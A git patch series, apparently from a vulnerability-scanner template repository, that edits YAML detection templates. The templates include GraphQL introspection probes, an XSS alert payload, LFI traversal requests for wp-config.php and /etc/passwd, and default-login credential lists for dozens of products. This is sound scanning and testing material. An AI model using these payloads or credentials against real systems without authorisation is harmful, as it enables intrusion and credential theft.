"{{BaseURL}}/v3" - - "{{BaseURL}}/graphql-console" - - "{{BaseURL}}/query-laravel" - - "{{BaseURL}}/v3/subscriptions" - - "{{BaseURL}}/v3/graphql/schema.xml" - - "{{BaseURL}}/v3/graphql/schema.yaml" - - "{{BaseURL}}/v3/playground" - - "{{BaseURL}}/v3/graphql/schema.json" - - "{{BaseURL}}/graphql/schema.yaml" - - "{{BaseURL}}/graphql/schema.xml" - - "{{BaseURL}}/graphql/schema.json" - - "{{BaseURL}}/graphiql/finland" - - "{{BaseURL}}/graphiql.css" - - "{{BaseURL}}/graphql-devtools" - - "{{BaseURL}}/graphql/v1" - - "{{BaseURL}}/v1/graphql" - - "{{BaseURL}}/api/graphql/v1" - - "{{BaseURL}}/portal-graphql" - - "{{BaseURL}}/graphql-playground" - - "{{BaseURL}}/laravel-graphql-playground" - - "{{BaseURL}}/query-explorer" - - "{{BaseURL}}/sphinx-graphiql" - - "{{BaseURL}}/express-graphql" - - "{{BaseURL}}/query" - - "{{BaseURL}}/HyperGraphQL" - - "{{BaseURL}}/graphql/graphql-playground" - - headers: - Content-Type: application/json - - body: '{"query":"query IntrospectionQuery{__schema {queryType { name }}}"}' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - "__schema" - - "(Introspection|INTROSPECTION|introspection).*?" - - ".*?operation not found.*?" - condition: or From 58d0ffb66d826c0b292b36a6065b071cccfca059 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 8 Oct 2021 12:11:57 +0530 Subject: [PATCH 2788/4083] Update graphql-detect.yaml --- technologies/graphql-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index 093ac44233..3c31133fed 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -4,7 +4,7 @@ info: name: GraphQL API Detection author: NkxxkN,ELSFA7110,@OFJAAAH severity: info - tags: tech,graphql + tags: tech,graphql,fuzz requests: - method: POST From 60a3b6f4a44e0dafd9114345f9147e3a9651877c Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Fri, 8 Oct 2021 03:46:49 -0300 Subject: [PATCH 2789/4083] Update qcubed-xss.yaml --- vulnerabilities/other/qcubed-xss.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/qcubed-xss.yaml b/vulnerabilities/other/qcubed-xss.yaml index cae77f9cf8..8d47a47d81 100644 --- a/vulnerabilities/other/qcubed-xss.yaml +++ b/vulnerabilities/other/qcubed-xss.yaml @@ -12,7 +12,8 @@ requests: path: - "{{BaseURL}}/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - + + stop-at-first-match: true matchers-condition: and matchers: - type: word From 976f69592989d78dee54eef7419f54d233ded27f Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Fri, 8 Oct 2021 03:53:52 -0300 Subject: [PATCH 2790/4083] Update zend-config-file.yaml --- exposures/configs/zend-config-file.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposures/configs/zend-config-file.yaml b/exposures/configs/zend-config-file.yaml index fd823f7d9b..4d035fbd48 100644 --- a/exposures/configs/zend-config-file.yaml +++ b/exposures/configs/zend-config-file.yaml @@ -22,7 +22,8 @@ requests: - "{{BaseURL}}/shop/application/configs/application.ini" - "{{BaseURL}}/site_cg/application/configs/application.ini" - "{{BaseURL}}/slr/application/configs/application.ini" - + + stop-at-first-match: true matchers-condition: and matchers: - type: word From d93f55304ed998b5571e9eb57fdddc98b4867e02 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 8 Oct 2021 22:16:16 +0900 Subject: [PATCH 2791/4083] Create wp-oxygen-theme-lfi.yaml --- wp-oxygen-theme-lfi.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 wp-oxygen-theme-lfi.yaml diff --git a/wp-oxygen-theme-lfi.yaml b/wp-oxygen-theme-lfi.yaml new file mode 100644 index 0000000000..46d2c6709b --- /dev/null +++ b/wp-oxygen-theme-lfi.yaml @@ -0,0 +1,26 @@ +id: wp-oxygen-theme-lfi + +info: + name: WordPress Oxygen-Theme Themes LFI + author: 0x_Akoko + severity: high + tags: wordpress,wp-theme,lfi,wp + reference: https://cxsecurity.com/issue/WLB-2019030178 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From cc38e20d1485c17f5d757791a506242c7e80044a Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 8 Oct 2021 08:31:41 -0500 Subject: [PATCH 2792/4083] Create CVE-2021-39327.yaml --- cves/2021/CVE-2021-39327.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-39327.yaml diff --git a/cves/2021/CVE-2021-39327.yaml b/cves/2021/CVE-2021-39327.yaml new file mode 100644 index 0000000000..50311817e5 --- /dev/null +++ b/cves/2021/CVE-2021-39327.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-39327 + +info: + name: WordPress BulletProof Security 5.1 Information Disclosure + author: geeknik + severity: medium + description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1. + reference: + - https://packetstormsecurity.com/files/164420/wpbulletproofsecurity51-disclose.txt + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39327 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39327 + tags: cve,cve2021,wordpress,disclosure + + requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt' + - '{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'BPS DB BACKUP LOG' + - '==================' + condition: and + + - type: status + status: + - 200 + + - type: word + part: header + words: + - 'text/plain' From 9e913ddb8ee02e9cd4fd97e50b39ed41db1487fc Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 8 Oct 2021 08:36:01 -0500 Subject: [PATCH 2793/4083] Update CVE-2021-39327.yaml --- cves/2021/CVE-2021-39327.yaml | 40 +++++++++++++++++------------------ 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/cves/2021/CVE-2021-39327.yaml b/cves/2021/CVE-2021-39327.yaml index 50311817e5..ab334963c8 100644 --- a/cves/2021/CVE-2021-39327.yaml +++ b/cves/2021/CVE-2021-39327.yaml @@ -11,26 +11,26 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-39327 tags: cve,cve2021,wordpress,disclosure - requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt' - - '{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt' +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt' + - '{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt' - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'BPS DB BACKUP LOG' - - '==================' - condition: and + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'BPS DB BACKUP LOG' + - '==================' + condition: and - - type: status - status: - - 200 + - type: status + status: + - 200 - - type: word - part: header - words: - - 'text/plain' + - type: word + part: header + words: + - 'text/plain' From de0a0ff3c1e04efd6cf56e62c50379f06f37df4c Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 8 Oct 2021 19:10:03 +0530 Subject: [PATCH 2794/4083] misc update --- vulnerabilities/other/pmb-directory-traversal.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/pmb-directory-traversal.yaml b/vulnerabilities/other/pmb-directory-traversal.yaml index dbe9ad6d29..74427ef576 100644 --- a/vulnerabilities/other/pmb-directory-traversal.yaml +++ b/vulnerabilities/other/pmb-directory-traversal.yaml @@ -14,13 +14,13 @@ requests: path: - "{{BaseURL}}/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik" - "{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik" - + stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0" - type: status status: From 87c57ed4aca208867c31c7b603fcd527a1a12b28 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 8 Oct 2021 13:40:21 +0000 Subject: [PATCH 2795/4083] Auto Generated CVE annotations [Fri Oct 8 13:40:21 UTC 2021] :robot: --- cves/2021/CVE-2021-40960.yaml | 7 ++++++- cves/2021/CVE-2021-41648.yaml | 5 +++++ cves/2021/CVE-2021-41649.yaml | 7 ++++++- cves/2021/CVE-2021-41826.yaml | 7 ++++++- 4 files changed, 23 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-40960.yaml b/cves/2021/CVE-2021-40960.yaml index 126dd45651..cca0c1c98f 100644 --- a/cves/2021/CVE-2021-40960.yaml +++ b/cves/2021/CVE-2021-40960.yaml @@ -3,12 +3,17 @@ id: CVE-2021-40960 info: name: Galera WebTemplate 1.0 – Directory Traversal author: daffainfo - severity: high + severity: critical description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow. reference: - http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960 tags: cve,cve2021,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-40960 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-41648.yaml b/cves/2021/CVE-2021-41648.yaml index 3c2322f4f0..cd7789ebef 100644 --- a/cves/2021/CVE-2021-41648.yaml +++ b/cves/2021/CVE-2021-41648.yaml @@ -7,6 +7,11 @@ info: description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input. reference: https://github.com/MobiusBinary/CVE-2021-41648 tags: cve,cve2021,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-41648 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2021/CVE-2021-41649.yaml b/cves/2021/CVE-2021-41649.yaml index 084555f45d..f9b72ad760 100644 --- a/cves/2021/CVE-2021-41649.yaml +++ b/cves/2021/CVE-2021-41649.yaml @@ -3,10 +3,15 @@ id: CVE-2021-41649 info: name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php author: daffainfo - severity: high + severity: critical description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input. reference: https://github.com/MobiusBinary/CVE-2021-41649 tags: cve,cve2021,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-41649 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2021/CVE-2021-41826.yaml b/cves/2021/CVE-2021-41826.yaml index 98cd0f66a4..63673f92a5 100644 --- a/cves/2021/CVE-2021-41826.yaml +++ b/cves/2021/CVE-2021-41826.yaml @@ -3,13 +3,18 @@ id: CVE-2021-41826 info: name: PlaceOS 1.2109.1 - Open Redirection author: geeknik - severity: low + severity: medium description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect reference: - https://github.com/PlaceOS/auth/issues/36 - https://www.exploit-db.com/exploits/50359 - https://nvd.nist.gov/vuln/detail/CVE-2021-41826 tags: cve,cve2021,placeos,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-41826 + cwe-id: CWE-601 requests: - method: GET From 09eeccdbcd8bdae1db9ab2ecbc5c5e96beb14f98 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 8 Oct 2021 19:12:34 +0530 Subject: [PATCH 2796/4083] Update prtg-detect.yaml --- technologies/prtg-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/prtg-detect.yaml b/technologies/prtg-detect.yaml index e8f202c055..6613cc861a 100644 --- a/technologies/prtg-detect.yaml +++ b/technologies/prtg-detect.yaml @@ -13,18 +13,18 @@ requests: - "{{BaseURL}}/index.htm" - "{{BaseURL}}/prtg/index.htm" - "{{BaseURL}}/PRTG/index.htm" - + stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: - "PRTG Network Monitor" - condition: and - type: regex part: header From 6a00b9245c2a1192b68cd1dd2b0b01b4bf0696d5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 8 Oct 2021 19:14:26 +0530 Subject: [PATCH 2797/4083] Update qcubed-xss.yaml --- vulnerabilities/other/qcubed-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/qcubed-xss.yaml b/vulnerabilities/other/qcubed-xss.yaml index 8d47a47d81..5309d50deb 100644 --- a/vulnerabilities/other/qcubed-xss.yaml +++ b/vulnerabilities/other/qcubed-xss.yaml @@ -12,7 +12,7 @@ requests: path: - "{{BaseURL}}/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - + stop-at-first-match: true matchers-condition: and matchers: From 8960821db1697e8332bfae730bb72709418bb6e5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 8 Oct 2021 19:15:26 +0530 Subject: [PATCH 2798/4083] Update zend-config-file.yaml --- exposures/configs/zend-config-file.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/zend-config-file.yaml b/exposures/configs/zend-config-file.yaml index 4d035fbd48..1f60324cbf 100644 --- a/exposures/configs/zend-config-file.yaml +++ b/exposures/configs/zend-config-file.yaml @@ -22,7 +22,7 @@ requests: - "{{BaseURL}}/shop/application/configs/application.ini" - "{{BaseURL}}/site_cg/application/configs/application.ini" - "{{BaseURL}}/slr/application/configs/application.ini" - + stop-at-first-match: true matchers-condition: and matchers: From ecca8374fc25c26205bd9d701fadd92648678f0d Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 8 Oct 2021 19:19:29 +0530 Subject: [PATCH 2799/4083] moving file around --- .../wordpress/wp-oxygen-theme-lfi.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename wp-oxygen-theme-lfi.yaml => vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml (90%) diff --git a/wp-oxygen-theme-lfi.yaml b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml similarity index 90% rename from wp-oxygen-theme-lfi.yaml rename to vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml index 46d2c6709b..63829a085e 100644 --- a/wp-oxygen-theme-lfi.yaml +++ b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml @@ -4,7 +4,7 @@ info: name: WordPress Oxygen-Theme Themes LFI author: 0x_Akoko severity: high - tags: wordpress,wp-theme,lfi,wp + tags: wordpress,wp-theme,lfi reference: https://cxsecurity.com/issue/WLB-2019030178 requests: @@ -23,4 +23,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file From 0e51fefd4b1f8aab2820cb9474ecc4bde8cf6549 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 8 Oct 2021 19:23:59 +0530 Subject: [PATCH 2800/4083] misc update --- cves/2021/CVE-2021-39327.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-39327.yaml b/cves/2021/CVE-2021-39327.yaml index ab334963c8..be772cbea1 100644 --- a/cves/2021/CVE-2021-39327.yaml +++ b/cves/2021/CVE-2021-39327.yaml @@ -9,7 +9,7 @@ info: - https://packetstormsecurity.com/files/164420/wpbulletproofsecurity51-disclose.txt - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39327 - https://nvd.nist.gov/vuln/detail/CVE-2021-39327 - tags: cve,cve2021,wordpress,disclosure + tags: cve,cve2021,wordpress,exposures requests: - method: GET From 462a599f5665a2b3b01c4f7d25b3c0c0865c3cb2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 8 Oct 2021 13:57:22 +0000 Subject: [PATCH 2801/4083] Auto Generated CVE annotations [Fri Oct 8 13:57:22 UTC 2021] :robot: --- cves/2021/CVE-2021-39327.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-39327.yaml b/cves/2021/CVE-2021-39327.yaml index be772cbea1..b98d2b69b6 100644 --- a/cves/2021/CVE-2021-39327.yaml +++ b/cves/2021/CVE-2021-39327.yaml @@ -10,6 +10,11 @@ info: - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39327 - https://nvd.nist.gov/vuln/detail/CVE-2021-39327 tags: cve,cve2021,wordpress,exposures + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-39327 + cwe-id: CWE-200 requests: - method: GET From 1bdafa447478d9320c20aaaebc5d53cf0d0f61ab Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 8 Oct 2021 19:28:24 +0530 Subject: [PATCH 2802/4083] Added missing condition for CVE-2019-18818 --- cves/2019/CVE-2019-18818.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml index 01d00b9999..597d2793e1 100644 --- a/cves/2019/CVE-2019-18818.yaml +++ b/cves/2019/CVE-2019-18818.yaml @@ -38,6 +38,7 @@ requests: part: header - type: word + condition: and words: - '"username":' - '"email":' From a476fc9ca4d9e9c853facf6876839c1596db0ea4 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 8 Oct 2021 11:30:44 -0500 Subject: [PATCH 2803/4083] Update laravel-env.yaml added case insensitivity to the regex matcher --- exposures/configs/laravel-env.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index 9c114adc54..2ee7097ee4 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml @@ -31,8 +31,8 @@ requests: matchers: - type: regex regex: - - "(?m)^APP_(NAME|ENV|KEY|DEBUG|URL|PASSWORD)=" - - "(?m)^DB_(HOST|PASSWORD|DATABASE)=" + - "(?mi)^APP_(NAME|ENV|KEY|DEBUG|URL|PASSWORD)=" + - "(?mi)^DB_(HOST|PASSWORD|DATABASE)=" condition: or - type: status From a19bd14feec9fe042a70ad3556bf9712515727cc Mon Sep 17 00:00:00 2001 From: Brian Zebrowski Date: Fri, 8 Oct 2021 12:42:54 -0400 Subject: [PATCH 2804/4083] Modified most of the default_logins templates to output username and password fields consistently --- default-logins/UCMDB/ucmdb-default-login.yaml | 18 +++++++++--- default-logins/abb/cs141-default-login.yaml | 29 +++++++------------ .../activemq/activemq-default-login.yaml | 19 ++++++++---- default-logins/aem/aem-default-login.yaml | 12 -------- .../alibaba/canal-default-login.yaml | 21 +++++++++----- .../ambari/ambari-default-login.yaml | 16 ++++++---- .../apache/airflow-default-login.yaml | 8 ++++- .../apache/superset-default-login.yaml | 9 +++++- default-logins/arl/arl-default-login.yaml | 21 +++++++++----- default-logins/axis2/axis2-default-login.yaml | 28 +++++++++++++----- .../azkaban/azkaban-default-login.yaml | 8 ++++- .../chinaunicom-default-login.yaml | 18 +++++++++--- .../dell/dell-idrac-default-login.yaml | 16 +++++++--- .../dell/dell-idrac9-default-login.yaml | 11 +++++-- .../dell/emcecom-default-login.yaml | 17 +++++++---- default-logins/druid/druid-default-login.yaml | 23 +++++++++++---- default-logins/dvwa/dvwa-default-login.yaml | 9 +++++- .../exacqvision-default-login.yaml | 9 +++++- default-logins/flir/flir-default-login.yaml | 9 +++++- default-logins/frps/frp-default-login.yaml | 17 +++++++---- default-logins/gitlab/gitlab-weak-login.yaml | 6 ++-- default-logins/glpi/glpi-default-login.yaml | 11 +++++-- .../grafana/grafana-default-login.yaml | 6 ++-- .../guacamole/guacamole-default-login.yaml | 9 +++++- .../hongdian/hongdian-default-login.yaml | 13 +++++++-- .../hortonworks/smartsense-default-login.yaml | 17 +++++++---- .../hp/hp-switch-default-login.yaml | 8 ++++- .../ibm/ibm-storage-default-credential.yaml | 9 +++++- .../idemia-biometrics-default-login.yaml | 14 ++++++--- .../iptime/iptime-default-login.yaml | 9 +++++- default-logins/jenkins/jenkins-default.yaml | 13 +++++++-- default-logins/minio/minio-default-login.yaml | 27 ++++++++--------- .../nagios/nagios-default-login.yaml | 21 ++++++++++---- default-logins/nexus/nexus-default-login.yaml | 9 +++++- default-logins/nps/nps-default-login.yaml | 22 +++++++++----- default-logins/ofbiz/ofbiz-default-login.yaml | 21 ++++++++++---- .../businessintelligence-default-login.yaml | 11 +++++-- .../paloalto/panos-default-login.yaml | 17 ++++++++--- .../panabit/panabit-default-login.yaml | 11 +++++-- .../rabbitmq/rabbitmq-default-login.yaml | 19 ++++++++---- default-logins/ricoh/ricoh-weak-password.yaml | 7 ++++- .../rockmongo/rockmongo-default-login.yaml | 9 +++++- .../samsung/samsung-wlan-default-login.yaml | 17 ++++++++--- .../showdoc/showdoc-default-login.yaml | 21 +++++++++----- .../solarwinds/solarwinds-default-login.yaml | 22 ++++++++++---- .../spectracom/spectracom-default-login.yaml | 9 +++++- default-logins/szhe/szhe-default-login.yaml | 21 +++++++++----- default-logins/vidyo/vidyo-default-login.yaml | 9 +++++- .../viewpoint/trilithic-viewpoint-login.yaml | 9 +++++- .../visionhub/visionhub-default-login.yaml | 17 +++++++---- .../wifisky/wifisky-default-login.yaml | 9 +++++- default-logins/wso2/wso2-default-login.yaml | 9 +++++- .../xxljob/xxljob-default-login.yaml | 9 +++++- .../zabbix/zabbix-default-login.yaml | 21 +++++++++----- .../zmanda/zmanda-default-login.yaml | 21 +++++++++----- 55 files changed, 582 insertions(+), 219 deletions(-) diff --git a/default-logins/UCMDB/ucmdb-default-login.yaml b/default-logins/UCMDB/ucmdb-default-login.yaml index 77cd96a74f..7118ae3120 100644 --- a/default-logins/UCMDB/ucmdb-default-login.yaml +++ b/default-logins/UCMDB/ucmdb-default-login.yaml @@ -7,10 +7,20 @@ info: tags: ucmdb,default-login requests: - - method: POST - path: - - "{{BaseURL}}/ucmdb-ui/cms/loginRequest.do;" - body: "customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB" + - raw: + - | + POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1 + Host: {{BaseURL}} + + customerID=1&isEncoded=false&userName=diagnostics&password={{base64(password)}}&ldapServerName=UCMDB + + payloads: + username: + - diagnostics + password: + - admin + attack: pitchfork + matchers-condition: and matchers: - type: status diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index eca65b4527..c06e4dc047 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -17,25 +17,18 @@ requests: Accept: application/json, text/plain, */* Content-Type: application/json - {"userName":"admin","password":"cs141-snmp"} + "userName":{{username}},"password":{{password}} - - | - POST /api/login HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */* - Content-Type: application/json - - {"userName":"engineer","password":"engineer"} - - - | - POST /api/login HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */* - Content-Type: application/json - - {"userName":"guest","password":"guest"} - - stop-at-first-match: true + payloads: + username: + - admin + - engineer + - guest + password: + - cs141-snmp + - engineer + - guest + attack: pitchfork matchers-condition: and matchers: - type: word diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml index d867be0088..25fcdc27c9 100644 --- a/default-logins/activemq/activemq-default-login.yaml +++ b/default-logins/activemq/activemq-default-login.yaml @@ -7,14 +7,23 @@ info: tags: apache,activemq,default-login requests: - - method: GET - path: - - '{{BaseURL}}/admin/' - headers: - Authorization: "Basic YWRtaW46YWRtaW4=" + - raw: + - | + GET /admin/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + payloads: + username: + - user + - admin + password: + - user + - admin + attack: pitchfork matchers: - type: word words: - 'Welcome to the Apache ActiveMQ Console of ' - '

    Broker

    ' condition: and + diff --git a/default-logins/aem/aem-default-login.yaml b/default-logins/aem/aem-default-login.yaml index 6ac263a2bd..71121fe48f 100644 --- a/default-logins/aem/aem-default-login.yaml +++ b/default-logins/aem/aem-default-login.yaml @@ -24,24 +24,12 @@ requests: - grios - replication-receiver - vgnadmin - - aparker@geometrixx.info - - jdoe@geometrixx.info - - james.devore@spambob.com - - matt.monroe@mailinator.com - - aaron.mcdonald@mailinator.com - - jason.werner@dodgit.com rr_password: - admin - password - replication-receiver - vgnadmin - - aparker - - jdoe - - password - - password - - password - - password attack: pitchfork # Available options: sniper, pitchfork and clusterbomb stop-at-first-match: true diff --git a/default-logins/alibaba/canal-default-login.yaml b/default-logins/alibaba/canal-default-login.yaml index 2b2c640fba..b61dd7ec9c 100644 --- a/default-logins/alibaba/canal-default-login.yaml +++ b/default-logins/alibaba/canal-default-login.yaml @@ -7,13 +7,20 @@ info: tags: alibaba,default-login requests: - - method: POST - path: - - "{{BaseURL}}/api/v1/user/login" - headers: - Content-Type: application/json - body: | - {"username":"admin","password":"123456"} + - raw: + - | + POST /api/v1/user/login HTTP/1.1 + Host: {{BaseURL}} + Content-Type: application/json + + "username":{{username}},"password":{{password}} + + payloads: + username: + - admin + password: + - 123456 + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/ambari/ambari-default-login.yaml b/default-logins/ambari/ambari-default-login.yaml index 0013f7acd5..6d8ceb4eee 100644 --- a/default-logins/ambari/ambari-default-login.yaml +++ b/default-logins/ambari/ambari-default-login.yaml @@ -7,11 +7,17 @@ info: tags: ambari,default-login requests: - - method: GET - path: - - '{{BaseURL}}/api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name' - headers: - Authorization: "Basic YWRtaW46YWRtaW4=" + - raw: + - | + GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 + Host: {{BaseURL}} + Authorization: Basic {{base64(username + ':' + password)}} + payloads: + username: + - admin + password: + - admin + attack: pitchfork matchers: - type: word words: diff --git a/default-logins/apache/airflow-default-login.yaml b/default-logins/apache/airflow-default-login.yaml index c01227d4b7..01b7979d10 100644 --- a/default-logins/apache/airflow-default-login.yaml +++ b/default-logins/apache/airflow-default-login.yaml @@ -21,8 +21,14 @@ requests: Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/admin/airflow/login - username=airflow&password=airflow&_csrf_token={{csrf_token}} + username={{username}}&password={{password}}&_csrf_token={{csrf_token}} + payloads: + username: + - airflow + password: + - airflow + attack: pitchfork extractors: - type: regex name: csrf_token diff --git a/default-logins/apache/superset-default-login.yaml b/default-logins/apache/superset-default-login.yaml index 26ec0e941e..36bf8da2ea 100644 --- a/default-logins/apache/superset-default-login.yaml +++ b/default-logins/apache/superset-default-login.yaml @@ -21,7 +21,14 @@ requests: Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/admin/airflow/login - csrf_token={{csrff_token}}&username=admin&password=admin + csrf_token={{csrff_token}}&username={{username}}&password={{password}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork extractors: - type: regex diff --git a/default-logins/arl/arl-default-login.yaml b/default-logins/arl/arl-default-login.yaml index 5523da410d..c0c34ba105 100644 --- a/default-logins/arl/arl-default-login.yaml +++ b/default-logins/arl/arl-default-login.yaml @@ -7,13 +7,20 @@ info: tags: arl,default-login requests: - - method: POST - path: - - "{{BaseURL}}/api/user/login" - headers: - Content-Type: application/json; charset=UTF-8 - body: | - {"username":"admin","password":"arlpass"} + - raw: + - | + POST /api/user/login HTTP/1.1 + Host: {{BaseURL}} + Content-Type: application/json; charset=UTF-8 + + "username":{{username}},"password":{{password}} + + payloads: + username: + - admin + password: + - arlpass + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/axis2/axis2-default-login.yaml b/default-logins/axis2/axis2-default-login.yaml index ac81168585..f66b2bdb67 100644 --- 